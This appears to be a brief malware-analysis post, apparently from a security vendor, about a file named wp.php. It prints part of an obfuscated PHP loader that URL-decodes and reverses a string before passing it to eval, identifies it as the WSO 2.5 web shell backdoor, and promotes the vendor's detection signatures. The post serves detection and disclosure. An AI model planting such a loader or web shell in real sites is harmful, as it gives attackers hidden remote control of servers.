wp.php

If we look inside this PHP script (only a small part of the code):

@error_reporting(0);@set_time_limit(0);
$code="%3Btixe%0D%0A%3B%29%5D%27a%27%5BTSOP_%24+.+%27noitca%27%28cnuf_resu_llac%09%0D%0A%29+$
$code=@urldecode($code);$code=@strrev($code);@eval($code);

Execute wp.php

If we run this, we found PHP Command shell WSO 2.5 (backdoor) this file:

wp.php

Detect this malware

Malware Expert – Signatures found this malware from php code, if you want use our signatures for free.